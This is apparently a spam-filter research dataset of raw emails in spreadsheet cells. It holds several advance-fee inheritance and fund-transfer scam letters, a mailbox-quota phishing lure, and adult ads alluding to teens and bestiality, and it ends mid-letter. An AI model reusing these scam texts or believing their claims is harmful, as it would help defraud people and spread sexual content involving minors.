    <t>\nSWEETIE AMINAT USMAN\nE.MAIL:ami44000@netzero.net\nTEL:234-8034540228\nDear Sir,/Madam\nI am LADY SWEETIE AMINA USMAN, Bank Manager of Zenith\nInternational Bank of Nigeria,Adeola Odeku Branch,Lagos . I have urgent and\n very\nconfidential business proposition for you. On June 6, 1999, an American Oil \nconsultant/contractor\nwith the Nigerian National Petroleum Corporation, Mr. Barry Kelly made a\nnumbered time (Fixed) Deposit for twelve calendar months, valued at\nUS$35,000,000.00 (Thirty- five Million Dollars) in my branch. Upon\nmaturity, I sent a routine notification to his forwarding address but got\nno reply. After a month, we sent a reminder and finally we discovered\nfrom his contract employers, the Nigerian National Petroleum Corporation\nthat Mr. Barry Kelly died from an automobile accident. On further\ninvestigation, I found out that he died without making a WILL, and all\nattempts to trace his next of kin was fruitless.\nI therefore made further investigation and discovered\nthat Mr. Barry Kelly did not declare any kin or relations in all his\nofficial documents, including his Bank Deposit paperwork in my Bank. This\nsum of US$35,000,000.00 is still sitting in my Bank and the interest is being\nrolled over with the principal sum at the end of each year. No one will\never come forward to claim it. According to Nigerian Law, at the\nexpiration of 5 (five) years, the money will revert to the ownership of the\nNigerian Government if nobody applies to claim the fund.\nConsequently, my proposal is that I will like you as a\nforiegner to stand in as the next of kin to Mr. Barry Kelly so that the\nfruits of this old man's labor will not get into the hands of some\ncorrupt government officials.\nThis is simple, I will like you to provide immediately\nyour full names and address so that the Attorney will prepare the\nnecessary documents and affidavits which will put you in place as the next\nof kin. We shall employ the service of an Attorney for\ndrafting and notarization of the WILL and to obtain the necessary documents and\nletter of probate/administration in your favor for the transfer.\nWe would need you as a Foreigner acting as the next of\nkin and sole benefactor to the inheritance of Mr. Barry Kelly to travel and\nclaim this money in a SECURITY COMPANY based in Europe or sub-regional\nAfrican country which is used by my bank as an offshore clearing house\nto the bank.The money will be paid to you for us to share in the ratio\nof 60% for me and 40% for you.\n\nThere is no risk at all as all the paperwork for this\ntransaction will be done by the Attorney and my position as the Branch\nManager guarantees the successful execution of this transaction.\nIf you are interested, please reply immediately via\nthe private email address below. Upon your response,I shall then provide\nyou with more details and relevant documents that will help you\nunderstand the transaction.\n\nPlease observe utmost confidentiality, and rest\nassured that this transaction would be most profitable for both of us because I\nshall require your assistance to invest my share in your country. Please\nfurnish me with your telephone and fax numbers for easier and faster\ncommunication. Awaiting your urgent reply via my \nemail:ami44000@netzero.net\nThanks and regards,\nSWEETIE AMINA USMAN\n\n \n\n \n\n________________________________________________________________\nThe best thing to hit the internet in years - NetZero HiSpeed!\nSurf the web up to FIVE TIMES FASTER!\nOnly $14.95/ month -visit [URL]www.netzero.com[/URL] to sign up today!\n\n</t>
  </si>
  <si>
    <t>www.netzero.com</t>
  </si>
  <si>
    <t>2995</t>
  </si>
  <si>
    <t>To: nan\nFrom: pascal dunga &lt;pascal_d19@hotmail.com&gt;\nDate: Wed, 28 Mar 2007 09:03:03 +0000</t>
  </si>
  <si>
    <t>Wed, 28 Mar 2007 09:03:03 +0000</t>
  </si>
  <si>
    <t>pascal dunga &lt;pascal_d19@hotmail.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">URGENT AND CALL ME IMMEDATILY : 00 226 78 86 66 99 </t>
  </si>
  <si>
    <t>FROM : MR PASCAL DUNGA,\nAUDITING AND ACCOUNTING SECTION,\nAFRICAN DEVELOPMENT BANK (A.D.B)\nOUAGADOUGOU BURKINA-FASO,WEST AFRICA.\n\n                            (TOP SECRET)\nDear Friend,\nI MR PASCAL DUNGA, the director in charge of auditing and accounting section \nof bank AFRICAN DEVLOPMENT BANK (A.D.B) Ouagadougou Burkina-faso West Africa \nwith due respect and regard. I have decided to contact you on a business \ntransaction that will be very beneficial to both of us at the end of the \ntransaction.\n\nDuring our investigation and auditing in this bank, my department came \nacross a very huge sum of money belonging to a deceased person who died  in  \nplane crash and the fund has been dormant in his account with this Bank \nwithout any claim of the fund in our custody either from his family or \nrelation before our discovery to this development.\n\nThe said amount was Ten US$10,000,000.00 (TEN Million Dollars)As it may \ninterest you to know, I got your impressive information through the \nBurkina-faso chamber of commerce on foreign business relations here in \nOuagadougou Burkina-faso.\n\nMeanwhile all the whole arrangement to put claim over this fund as the \nbonafide next of kin to the deceased, get the required approval and transfer \nthis money to a foreign account has been put in place and directives and \nneeded information will be relayed to you as soon as you indicate your \ninterest and willingness to assist us and also benefit your self to this \ngreat business opportunity.\n\nIn fact I could have done this deal alone but because of my position in this \ncountry as a civil servant(A Banker),we are not allowed to operate a foreign \naccount and would eventually raise an eye brow on my side during the time of \ntransfer because I work in this bank.\n\nThis is the actual reason why it will require a second party or fellow who \nwill forward claims as the next of kin with affidavit of trust of oath to \nthe Bank and also present a foreign account where he will need the money to \nbe re-transferred into on his request as it may be after due verification \nand clarification by the correspondent branch of the bank where the whole \nmoney will be remitted from to your own designation bank account.\n\nI will not fail to inform you that this transaction is 100% risk free. On \nsmooth conclusion of this transaction, you will be entitled to 30% of the \ntotal sum as gratification, while 5% will be set aside to take care of \nexpenses that may arise during the time of transfer and also telephone \nbills, while 65% will be for me and my partners. Please, you have been \nadviced to keep "top secret" as I am still in service and intend to retire \nfrom service after we conclude this deal with you.\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information will be sent to you when \nI hear from you.\n\nI look forward to receive your phone and fax numbers for easy communication.\nURGENT AND CALL ME IMMEDATILY : 00 226 78 86 66 99\n\nhere is my privet Email contact for securect pupose (pascaldunga@myway.com)\nYours faithfully,\nMR.PASCAL DUNGA,\n\n_________________________________________________________________\nMSN Messenger : appels gratuits de PC  PC ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>618</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: "Email Server" &lt;thanhlongkd@hn.vnn.vn&gt;\nDate: Wed, 28 Jun 2017 09:18:24 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Jun 2017 09:18:24 +0100</t>
  </si>
  <si>
    <t>"Email Server" &lt;thanhlongkd@hn.vnn.vn&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Your Mailbox  Storage Is Running Low, Please Upgrade Now </t>
  </si>
  <si>
    <t>g0DRD9V6866X31        	         F5NF6N3B4C:   	      `A8v84F5{B1 (jose@monkey.org) NCAY29\07ABDC89!     F5NF6OE1`6F:  	       b11P11lE8a0FR300C`A8v84F5{B1 4D4DS73\07u28[8C   N0DN45_8C0C`A8\07N0DQ8DFDY20 cA5e36b16v7C01eB0F5NF6002   sFEW280CO600081O60v84F5NF64D 4DS47}1AR3015GBQ4DBB   DEdCANE5N0BC8cA50C93`A8v8415GBQ4DBB1A   [URL]http://jose@monkey.org[/URL]   `A8v84F5{B1\07f2FNCAY29DC 890CY82g9CO60N0DS47}1AR3015GB      F5NF6v7CNF6NBA:   	      F5{B1OE1`6FN2D_C3  Untitled Document   服務器警報      郵件主題:    您的郵箱 (jose@monkey.org) 今天將被關閉!  郵件信息:  我們注意到，您的郵箱 配額即將用完  不久後，您將不再能夠 接收或發送新郵件。  現在，你需要你的郵件配 額升級到15GB免費  點擊以下鏈接，讓您的15GB免費：  [URL]http://jose@monkey.org[/URL]  您的郵箱將是今天關 閉，如果你不升級到15GB     郵件發件人:    郵箱信息中心</t>
  </si>
  <si>
    <t>571</t>
  </si>
  <si>
    <t>To: webmaster@aclweb.org\nFrom: Kalister Maunda &lt;kalika@tiscali.co.uk&gt;\nDate: Wed, 28 Jan 2004 16:44:22 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Jan 2004 16:44:22 +0100</t>
  </si>
  <si>
    <t>Kalister Maunda &lt;kalika@tiscali.co.uk&gt;</t>
  </si>
  <si>
    <t>webmaster@aclweb.org</t>
  </si>
  <si>
    <t>YOURS</t>
  </si>
  <si>
    <t xml:space="preserve">INVESTMENT ASSISTANCES.\nGreetings,\n.\nHow are you? And hope all is well?\n.\n    You might be surprise to receive this mail but I will appreciate you read it carefully before responding or commenting, I hope at the end it will find you and your business in the best of interest. Let me quickly introduce the reason and myself why contacting you is very important. I am Kalister Maunda; a senior staff at the Office of the Minister of Petroleum Affairs in Angola. I have traveled along side with the Minister of Petroleum to your country in search of investors that would be interested to invest on our Petroleum Sector, it was in one of this trip that I was opportune to realize that the trips been made by the Minister is not for the search for an investor but for the search for what he will invest part of the Money made from Angolan petroleum sector that he has diverted to be his own. I was shocked at this discovery, but I later realized that I was the only one among other top staffs that was not aware of these happenings, investigation into this matter made me to know that even the president is involved. I suddenly realized that the BBC and the Excite news achieve below is true.\n[URL]http://news.bbc.co.uk[/URL]\n[URL]http://apnews.excite.com[/URL]\n.\nOn arrival from the trip I made with the minister and went straight to confront my Head of Department, of my findings and he told me that he is aware of the whole situation, he went further to show me some documents that was used to withdraw some millions of American Dollars that was meant to be used to pay Oil contracting Firms in Angola, he said I should assist him in the search for a reputable and trust worthy business man that can assist us in transferring the funds to a safe place where it will be used for Future Investment.\n.\n    I am therefore asking for your opinion on this issue, will you be able to assist us in transferring and claiming the money of which some percentage of the total amount involved will be granted to you for assisting us and for the time you spent on the transaction.\n.\n    If you are willing and capable to assist us kindly provide us with details of how we can reach you by phone or by fax so that we can proceed to conclude this transaction. \n.\nYours Truly,\nKalister Maunda [MISS]\nkalika@spinfinder.com\n.\nThe information contained in this email message is confidential It is intended solely for the addressee. Access to this email by anyone else is unauthorized. If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful. Kindly delete if the content of the mail is not of interest to you.  </t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://apnews.excite.com</t>
  </si>
  <si>
    <t>2935</t>
  </si>
  <si>
    <t>To: nan\nFrom: baro isa &lt;baro035@hotmail.fr&gt;\nDate: Wed, 28 Feb 2007 20:01:51 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Feb 2007 20:01:51 +0100</t>
  </si>
  <si>
    <t>baro isa &lt;baro035@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>PARTNERSHIP/INVESTMENT PROPOSAL</t>
  </si>
  <si>
    <t>FROM: MR BARO ISA\nBANK OF AFRICA (BOA)\nOUAGADOU-BURKINA FASO\n\nDEAR FRIEND,\n\nTHIS MESSAGE MIGHT MEET YOU IN UTMOST SURPRISE.HOWEVER,IT'S JUST THE URGENT \nNEED FOR A FOREIGN PARTNER THAT MADE ME TO CONTACT YOU FOR THIS TRANSACTION. \nI AM A BANKER BY PROFESSION FROM BURKINA FASO IN WEST AFRICA AND CURRENTLY \nHOLDING THE POST OF BILL AND EXCHANGE DIRECTOR IN OUR BANK.\n\nI HAVE THE OPPORTUNITY OF TRANSFERRING THE LEFT OVER FUNDS THAT AMOUNTS TO \n$15.5MILLION DOLLARS INTO A FOREIGN ACCOUNT AND THE SAID FUND BELONGS TO OUR \nDECEASED CLIENTS WHO DIED ON 31 JULY 2000 IN A PLANE CRASH.\n\nHENCE, I AM INVITING YOU FOR A BUSINESS DEAL WHERE THIS MONEY CAN BE SHARED \nBETWEEN US IN THE RATIO OF 60/40 IF YOU AGREE TO MY BUSINESS PROPOSAL.\n\nFURTHER DETAILS OF THE TRANSFER WILL BE FORWARDED TO YOU AS SOON AS I \nRECEIVE YOUR RETURN MAIL.\n\nHAVE A GREAT DAY.\n\nYOURS,\nMR BARO ISA.\n\n_________________________________________________________________\nGagnez des pc Windows Vista avec Live.com [URL]http://www.image-addict.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>4230</t>
  </si>
  <si>
    <t>To: &lt;zzzz@spamassassin.taint.org&gt;\nFrom: "IQ - Financial Brokerage" &lt;fn@insiq.us&gt;\nDate: Wed, 28 Aug 2002 19:05:41 -0400</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 19:05:41 -0400</t>
  </si>
  <si>
    <t>"IQ - Financial Brokerage" &lt;fn@insiq.us&gt;</t>
  </si>
  <si>
    <t>Sometimes Less is More...</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_84D25_01C24EAF.CD089410 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  Maximizer Select	  Want to pay less for term insurance?	 Find out how your clients can pay less by paying more - - while you earn more commission. 	  	Simplified Underwriting	  	Advanced Commissions	   	Return of Premium	  	Renewal Commissions	  Call today to find out how CNA's Maximizer Select will work for you! 	  800-397-9999	 Please fill out the form below for more information	  Name:	 	  E-mail:	 	  Phone:	 	  City:	 	 State:	 	  	  	    	     _____     CNA and CNA Life are registered service marks, trade names and domain names and CNA Maximizer is a registered service mark of CNA Financial Corporation. CNA life insurance products are underwritten by Valley Forge Life Insurance Company, one of the CNA companies. Policy form numbers: V100-1201-A, V100-1202-A, V100-1203-A, V100-1204-A Series. These products and features are not available in all states. For Producer use only. We don't want anybody to receive our mailing who does not wish to receive them. This is a professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.insuranceiq.com[/URL]   Legal Notice   	 ------=_NextPart_000_84D25_01C24EAF.CD089410 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sometimes Less is More... =20 =20      =20            =20           =20             Find out how your clients can pay = less by payingmore - - while you earn more commission. =20             Simplified = Underwriting   Advanced Commissions =20             Return of = Premium   Renewal = Commissions =20            Call today to find out = howCNA's Maximizer Select will work for you! =20            =20            =20                    =20                         Please fill out the form below for more = information =20                         Name:   =20                         E-mail:   =20                         Phone:   =20                         City:   State:   =20                           =20                           =20                           =20                           =20                          =20           =20              =20            =20            CNA=20             and CNA Life are registered service marks, trade names and = domain=20             names and CNA Maximizer is a registered service mark of CNA = Financial=20             Corporation. CNA life insurance products are underwritten by = Valley=20             Forge Life Insurance Company, one of the CNA companies. = Policy form=20             numbers: V100-1201-A, V100-1202-A, V100-1203-A, V100-1204-A = Series.=20             These products and features are not available in all states. = For Producer=20             use only.             We don't want anybody to receive our mailing who does not = wish to=20             receive them. This is a professional communication sent to = insurance=20             professionals. To be removed from this mailing list, DO NOT = REPLY=20             to this message. Instead, go here: [URL]http://www.insuranceiq.com[/URL] tout Legal = Notice=20            =20 ------=_NextPart_000_84D25_01C24EAF.CD089410--</t>
  </si>
  <si>
    <t>http://www.insuranceiq.com http://www.insuranceiq.com</t>
  </si>
  <si>
    <t>4224</t>
  </si>
  <si>
    <t>To: dsi3@yahoo.com\nFrom: loki@mymail.dk\nDate: Wed, 28 Aug 2002 17:39:48 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 17:39:48 +0100</t>
  </si>
  <si>
    <t>loki@mymail.dk</t>
  </si>
  <si>
    <t>dsi3@yahoo.com</t>
  </si>
  <si>
    <t>WORK FROM HOME.  WE ARE HIRING</t>
  </si>
  <si>
    <t>Help wanted.  We are a 14 year old fortune 500 company, that is\ngrowing at a tremendous rate.  We are looking for individuals who\nwant to work from home.\n\nThis is an opportunity to make an excellent income.  No experience\nis required.  We will train you.\n\nSo if you are looking to be employed from home with a career that has\nvast opportunities, then go:\n\n[URL]http://www.basetel.com[/URL]\n\nWe are looking for energetic and self motivated people.  If that is you\nthan click on the link and fill out the form, and one of our\nemployement specialist will contact you.\n\nTo be removed from our link simple go to:\n\n[URL]http://www.basetel.com[/URL]\n\n\n7227aeeO9-622YVDD8442BJPk2-748ZYrZ8462VnMG1-197fVVA2035gqEj3-l57</t>
  </si>
  <si>
    <t>http://www.basetel.com http://www.basetel.com</t>
  </si>
  <si>
    <t>4228</t>
  </si>
  <si>
    <t>To: JM@NETNOTEINC.COM\nFrom: Shannon &lt;greatoffers@sendgreatoffers.com&gt;\nDate: Wed, 28 Aug 2002 17:28:03 -0500</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 17:28:03 -0500</t>
  </si>
  <si>
    <t>Shannon &lt;greatoffers@sendgreatoffers.com&gt;</t>
  </si>
  <si>
    <t>JM@NETNOTEINC.COM</t>
  </si>
  <si>
    <t>Your Shipment Status</t>
  </si>
  <si>
    <t>![]([URL]http://admanmail.com[/URL] |  \n  \n# Congratulations JM@NETNOTEINC.COM!\n\nDear\nJM@NETNOTEINC.COM,![]([URL]http://admanmail.com[/URL]\n\nYou've been selected to receive a bottle of Calvin Klein's cKbe - **FREE***.\n\nClick here now for the scent that's great for both men and women.\n\nIt's the perfect scent to wear for any occassion. It's light, and just a\nlittle citrusy - you'll love it for Summer! Click here now and we'll send this\nrefreshing scent right out to you.\n\nWith only a few bottles on hand, I know they won't last long. Guarantee your\nown good fortune - and click here to claim your very own bottle of Calvin\nKlein's cKbe.\n\nJM@NETNOTEINC.COM act now and click here for a one time only chance!\n\nSincerely,  \n![]([URL]http://admanmail.com[/URL]  \nLori Anderson  \nYourFreePresent.com\n\nP.S. Please feel free to forward this great offer to a friend!\n\n*All offers are based on 100% customer satisfaction. Yourfreepresent reserves the right to cancel this offer any time once quantities run out. A handling charge of $5.93 will be applied to each item. All merchandise and offers are based on first come first serve. Offer not valid in the state of California.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admanmail.com http://admanmail.com http://admanmail.com http://admanmail.com http://admanmail.com</t>
  </si>
  <si>
    <t>4221</t>
  </si>
  <si>
    <t>To: EIN Media &lt;allcontacts@briefs.ein.cz&gt;\nFrom: EIN News &lt;pe@europeaninternet.com&gt;\nDate: Wed, 28 Aug 2002 15:58:44 +0200 (CEST)</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 15:58:44 +0200 (CEST)</t>
  </si>
  <si>
    <t>EIN News &lt;pe@europeaninternet.com&gt;</t>
  </si>
  <si>
    <t>EIN Media &lt;allcontacts@briefs.ein.cz&gt;</t>
  </si>
  <si>
    <t>Iraq Today Daily News - FREE Trial</t>
  </si>
  <si>
    <t>Dear Sir/Madam,\n\nMy name is Petr Stanek and I am managing the Iraq Today\nnews service ([URL]www.europeaninternet.com[/URL] Iraq Today\ncontains hourly updated breaking news headlines, exchange rates,\nmarket news and other important information.\n\nYou and your associates can have a FREE TRIAL\nSUBSCRIPTION to Iraq Today.\n\nYou will have access to a collection of 25,000 daily updated\narticles, a news archive and many other benefits too.\n\nOnce again, this trial is FREE. To subscribe, just reply to this\ne-mail or sign up at:\n[URL]http://www.europeaninternet.com[/URL]\n\nA partial list of current EIN subscribers can be found at:\n[URL]http://www.europeaninternet.com[/URL]\n\nIf you have any questions, comments, or need assistance signing\nup, please contact us personally by either writing to\nhelpdesk@europeaninternet.com or simply replying to this email.\n\nPlease feel free to forward this offer to any of your colleagues.\n\nBest regards,\n\nPetr Stanek\nSubscription Department\nEIN News\n\n\n\n\n\n\n\n\n\n\n\nTo be removed please reply to: remove@europeaninternet.com</t>
  </si>
  <si>
    <t>www.europeaninternet.com http://www.europeaninternet.com http://www.europeaninternet.com</t>
  </si>
  <si>
    <t>4212</t>
  </si>
  <si>
    <t>To: &lt;Undisclosed.Recipients@webnote.net&gt;\nFrom: andijeanehuaa@yahoo.com\nDate: Wed, 28 Aug 2002 13:31:07 -0500</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 13:31:07 -0500</t>
  </si>
  <si>
    <t>andijeanehuaa@yahoo.com</t>
  </si>
  <si>
    <t>&lt;Undisclosed.Recipients@webnote.net&gt;</t>
  </si>
  <si>
    <t>Get your own fountain of youth! HGH human growth hormone from 21st Century!17441</t>
  </si>
  <si>
    <t>As seen on NBC, CBS, CNN, and even Oprah! The health discovery that actuallyreverses aging \nwhile burning fat, without dieting or exercise! This provendiscovery has even been reported \non by the New England Journal of Medicine.Forget aging and dieting forever! And it's \nGuaranteed! \n\nClick below to enter our web site:\n[URL]http://market.liangshanpo.com[/URL]\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Click below to enter our web site:\n[URL]http://market.liangshanpo.com[/URL]\n\n\n**************************************************\nIf you want to get removed\nfrom our list please email at- affiliateoptout@btamail.net.cn\n(subject=remove "your email")\n**************************************************</t>
  </si>
  <si>
    <t>http://market.liangshanpo.com http://market.liangshanpo.com</t>
  </si>
  <si>
    <t>4235</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "DR SAMUEL EBOKA" &lt;SAMUELEBOKA11@YAHOO.COM&gt;\nDate: Wed, 28 Aug 2002 11:57:10 -1200</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 11:57:10 -1200</t>
  </si>
  <si>
    <t>"DR SAMUEL EBOKA" &lt;SAMUELEBOKA11@YAHOO.COM&gt;</t>
  </si>
  <si>
    <t>[ILUG] IMPORTANT.</t>
  </si>
  <si>
    <t>&gt;&gt;From the desk of: DR. SAMUEL EBOKA.\nTel No: Your Intl. Access Code + 873762692484\nFax No: Your Intl. Access Code + 873762692485\nemail : samueleboka2@email.com\nLagos, Nigeria.\nDear Sir,\n\nIMPORTANT.\n\nAfter due deliberation with my colleagues, We have decided to forward to\nyou this business proposal. We want a reliable \nperson who could assist us in the transfer the sum of Twenty Million, Five\nHundred Thousand United States Dollars ( \n$20,500,000 ). Via International Bank Draft Cashable in any First World\nCountries.\n\nThis fund resulted from an over-invoiced bill from contracts awarded by us\nunder the budget allocation to our Ministry. This \nbill has been approved for payment by the other concerned Ministries. The\ncontract has since been executed, \ncommissioned and the contractor was paid the actual cost of the contract.\nWe are left with the balance US$20.5M as part \nof the over-invoiced amount which we have deliberated over estimated for\nour own use. But under our protocol division, we \nas civil servants are forbidden to operate or own foreign accounts. This\nis why we are soliciting your assistance in this \nmanner and regard .\n\nAs you may want to know and to make you less curious, I got your address\nfrom adverts in the business directory . I am the \nChief Accountant/Internal Auditor of the Contract Award Committee ( CAC )\nof the Nigerian National Petroleum Corporation \n( NNPC). This transaction is very much free from all sorts of RISKS and\nTROUBLE from my Government. We the N.N.P.C. \nOfficials involved in this deal have put in many years in service to this\nMinistry. We have been exercising patience for this \nopportunity for so long and to most of us this is a life time opportunity\nwe cannot afford to miss.\n\nWe have agreed to COMPENSATE you duly if agreement is reached by both of\nus and I and one of my colleagues \ninvolved in this deal will come to your country to arrange for our share,\nupon the confirmation from you that the Certified \nInternational Bank Draft has been Approved and Raised in your favor.\n\nConsequent upon your acceptance of this proposal, kindly confirm your\ninterest by Telephone to me, through my Direct Tel \nNo: +873-762-692484. (Please Call Direct, DO NOT add my country(234) and\nCity(1) codes ) . Your indication by revert \nTelephone to me of your sincere and serious interest will enable me fax\nyou or brief you of  the PROCEDURES FOR THIS \nTRANSACTION. If my line is busy, please keep trying you will surely get\nthrough.\nNOTE: In the event of your inability to handle this transaction please\ninform us so that we can look for another reliable \nperson who can assist in this respect. \n\nIt might surprise you why we choose you and trusted you for this\ntransaction. Yes, we believe that good friends can be \ndiscovered and business like this can not be realized without mutual\ntrust. This is why we have decided to trust you for this \ntransaction. Be further informed that everyones interest and\nsecurity had been considered before you were contacted, so be rest assured\nand feel free to go into this transaction with \nus.\nBut let Honesty and Trust be our watchword throughout this transaction and\nyour prompt reply will be highly appreciated. \nThank you, and God bless.\n\nBest Regards,\n\nDR. SAMUEL  EBOKA.\n\nNOTE:- THAT YOU CAN USE THIS ALTERNATIVE EMAIL ADDRESSES:\nsamueleboka2@email.com , sameboka@uymail.com\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>4225</t>
  </si>
  <si>
    <t>To: webmaster@efi.ie\nFrom: Tiffany Grey &lt;hnplayboybaby69@site-personals.com&gt;\nDate: Wed, 28 Aug 2002 10:02:37 -0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 10:02:37 -0700</t>
  </si>
  <si>
    <t>Tiffany Grey &lt;hnplayboybaby69@site-personals.com&gt;</t>
  </si>
  <si>
    <t>webmaster@efi.ie</t>
  </si>
  <si>
    <t>I just put my webcam on 4u hunnie=)</t>
  </si>
  <si>
    <t>Wanna see sexually curious teens playing with each other on webcam? [URL]http://www.yourtastybaby.net[/URL]  &lt;----- our webcam link=) me and my dorm mate are eating each other out as we speak! see you soon baby, -Tiffany kludlkaiplcqcnnaigaybaxhesrhltsp</t>
  </si>
  <si>
    <t>http://www.yourtastybaby.net</t>
  </si>
  <si>
    <t>4220</t>
  </si>
  <si>
    <t>To: social@linux.ie\nFrom: Kelly Carpelli &lt;mbnxkelly@site-personals.com&gt;\nDate: Wed, 28 Aug 2002 09:17:55 -0400</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 09:17:55 -0400</t>
  </si>
  <si>
    <t>Kelly Carpelli &lt;mbnxkelly@site-personals.com&gt;</t>
  </si>
  <si>
    <t>[ILUG-Social] my webcam is on babe!</t>
  </si>
  <si>
    <t>Hello, my name is Kelly, I am an 18 year old swimming instructor from Longbeach.  I am intelligent, sexy and discreet. I love to laugh and have fun. Like most young girls, i like to go out with my friends and dance all night. When I'm home and have nothing to do, I love to chat and be naughty n naked on my webcam.  Get a chance to catch me "LIVE" on my webcam. I'm waiting for you.... [URL]http://www.site-personals.com[/URL]  &lt;---click and access me instantly hunnie;) later baby, mmwa! ewidvtdksrvaptnjsvsgeqcpafu --  Irish Linux Users' Group Social Events: social@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.site-personals.com http://www.linux.ie</t>
  </si>
  <si>
    <t>4222</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: jessica &lt;tdbannie@aol.com&gt;\nDate: Wed, 28 Aug 2002 07:40:40 -0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 07:40:40 -0700</t>
  </si>
  <si>
    <t>jessica &lt;tdbannie@aol.com&gt;</t>
  </si>
  <si>
    <t>Re: Here is your Free Access</t>
  </si>
  <si>
    <t>###################################\n\n  FREE Adult Lifetime Membership\n      Limited Time Offer!!!\n\n###################################\n\nYOUR INSTANT ACCESS PASSWORD\nLOGIN NAME:   zzzz@spamassassin.taint.org \nPASSWORD:     AcKWGy4L\n\n5 of the Best Adult Sites on the Internet for FREE!\n\n---------------------------\n\nNEWS 08/28/02\nOver 3.1 Million Members have signed up for FREE, Last month 229,947\nNew Members signed up for Free with the limited time offer.\nAre you a FREE Member yet???\n\n---------------------------\n\nOur Membership FAQ\n\nQ. Why are you offering free access to 5 adult membership sites for free?\n\nA. We have advertisers that pay us for ad space so you don't have to\npay for a membership.\n\nQ. Is it true that your membership is Free for life?\nA. Absolutely, you'll never have to pay a cent the advertisers do.\n\nQ. Do I have to sign up for all 5 FREE membership sites?\nA. No, just one to get access to all of them.\n\nQ. Why do I have to give my Credit Card Information?\nA. It's for age verification purposes only and you will not be charged.\n   If you don't believe us, just read their terms and conditions.\n\nQ. How do I get started?\nA. Click on one of the links below to become a Free member.\n\n---------------------------\n\n# 5. &gt; Adults Farm\n[URL]http://80.71.66.8[/URL]\nGirls and Animals Getting Freaky....FREE Lifetime Membership!!\n\n# 4. &gt; Sexy Celebes\n[URL]http://80.71.66.8[/URL]\nThousands Of XXX Celebes doing it...FREE Lifetime Membership!!\n\n# 3. &gt; Play House Porn\n[URL]http://80.71.66.8[/URL]\nLive Feeds From 60 Sites And Web Cams...FREE Lifetime Membership!!\n\n# 2. &gt; Lesbian Lace\n[URL]http://80.71.66.8[/URL]\nGirls and Girls Getting Freaky! ...FREE Lifetime Membership!!\n\n# 1. &gt; Teen Sex Fantasies\n[URL]http://80.71.66.8[/URL]\nTeen Schoolgirls, Live Sex Shows ...FREE Lifetime Membership!!\n\n--------------------------\n\nJennifer Simpson, Miami, FL\nYour FREE lifetime membership has entertained my boyfriend and I for\nthe last two years!  Your Adult Sites are the best on the net!\n\nJoe Morgan Manhattan, NY\nYour live sex shows and live sex cams are unbelievable. The best part\nabout your porn sites, is that they're absolutely FREE!\n\n--------------------------\n\n\nRemoval Instructions:\nYou have received this advertisement because you have opted in to\nreceive free adult internet offers and specials through our affiliated\nwebsites. If you do not wish to receive further emails or have received\nthe email in error you may opt-out of our database here:\n[URL]http://80.71.66.8[/URL] Please allow 24 hours for removal.\n\nThis e-mail is sent in compliance with the Information Exchange\nPromotion and Privacy Protection Act. section 50 marked as\n'Advertisement' with valid 'removal' instruction.\n\nbdyjkpbwheotewwcloiveajvkidto</t>
  </si>
  <si>
    <t>http://80.71.66.8 http://80.71.66.8 http://80.71.66.8 http://80.71.66.8 http://80.71.66.8 http://80.71.66.8</t>
  </si>
  <si>
    <t>DNK</t>
  </si>
  <si>
    <t>2545</t>
  </si>
  <si>
    <t>To: nan\nFrom: godwin amiri &lt;godwin_am035@hotmail.com&gt;\nDate: Wed, 27 Sep 2006 02:23:18 +0000</t>
  </si>
  <si>
    <t>Wed, 27 Sep 2006 02:23:18 +0000</t>
  </si>
  <si>
    <t>godwin amiri &lt;godwin_am035@hotmail.com&gt;</t>
  </si>
  <si>
    <t>From The Desk Of  Godwin Amiri (Esq).</t>
  </si>
  <si>
    <t>&gt;From The Desk Of  Godwin Amiri (Esq).\nThe Head Of File Department,\nAfrican Development Bank A.D.B\nOuagadougou Burkina-Faso West Africa.\nPhone: 00226-7885 75 97.\nPLANE CRASH WEB SITE...[URL]http://news.bbc.co.uk[/URL]\n\n                         ("REMITTANCE OF $15 MILLION U.S.A DOLLARS\n                                   CONFIDENTIAL IS THE CASE")\n\n\nCompliments Of The Season 2006,\n\n     Forgive my indignation if this message comes to you as a surprise and\nmay offend your personality for contacting you without your prior consent \nand\nwriting through this channel.I got your contact from the proffesional data \nbase\nfound in the internet Yahoo tourist search.When i was searching for a \nforeign reliable partner.I assured of your capability and reliability to \nchampion this businees opportunity.\n\n     After series of prayers/fasting.i was divinely directed to contact you\namong other names found in the data base Yahoo tourist search.I believe that \nGod has a way of helping who is in need.\n\n   I am (Godwin Amiri Esq),the Head of file Department in African developent \nbank (ADB).\n\nIn my department we discovered an abandoned sum of $ 15 million U.S.A \ndollars ( fifteen million U.S.A dollars) . In an account that belongs to 